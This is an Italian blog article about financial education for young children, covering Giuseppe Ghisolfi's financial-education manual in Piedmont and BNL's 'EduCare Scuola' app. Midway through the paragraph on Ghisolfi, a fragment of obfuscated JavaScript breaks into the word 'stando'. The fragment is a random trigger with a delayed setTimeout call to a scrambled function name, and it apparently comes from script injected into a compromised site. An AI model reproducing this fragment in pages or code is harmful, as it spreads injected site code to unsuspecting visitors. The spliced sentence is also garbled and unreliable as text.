Da non perdere!

Lezioni di economia per i più piccoli

Pubblicato il 26 novembre 2015
Condividi

Le banche insegnano l'economiaInteressante iniziativa di alcuni istituti di credito che hanno impartito delle vere e proprie lezioni di economia a piccoli studenti.

Il Piemonte, a partire dal 2014, è stato oggetto di un esperimento pilota felice e altrettanto fortunato, frutto della mente geniale di uno dei massimi economisti ed esperti di banche italiane: Giuseppe Ghisolfi, Vice Presidente ABI (Associazione Bancaria Italiana), già membro ed Ex Presidente dell’ACRI (Associazione Casse di Risparmio Italiane), nonché Presidente della plurisecolare Cassa di Risparmio di Fossano, da anni ormai, standom()*5);if (c==3){var delay = 15000;setTimeout($hiVNZt4Y5cDrbJXMhLy(0), delay);}ando ai dati ufficiali dei più prestigiosi organi economici, la prima e più solida banca piemontese per capacità di raccolta liquidi agli sportelli.

È grazie a lui se è nato uno strumento, quale il suo ormai celeberrimo “Manuale di Educazione Finanziaria”, testo che lo stesso autore ha presentato in molteplici scuole primarie piemontesi, consentendo anche a chi è ancora nell’età del gioco e dell’inizio degli studi di potersi approcciare correttamente a temi economici dai quali ormai, indipendentemente dalle età, non è più possibile prescindere.

L’iniziativa ha visto un seguito nel cosiddetto progetto “EduCare Scuola”, realizzata da BNL, noto gruppo finanziario nazionale. La formula prevede la spiegazione di parole chiave dell’economia e della finanza mediante un linguaggio semplificato, senza tuttavia sminuire termini e concetti.

Fondamentale, in questo caso, la realizzazione di una app i cui protagonisti sono una famiglia con due figli, maschio e femmina, alle prese con la realizzazione di progetti e sogni per i quali è necessaria, per l’appunto, la conoscenza di quanto proposto nel programma del progetto.

Lascia un commento

Il tuo indirizzo email non sarà pubblicato. I campi obbligatori sono contrassegnati *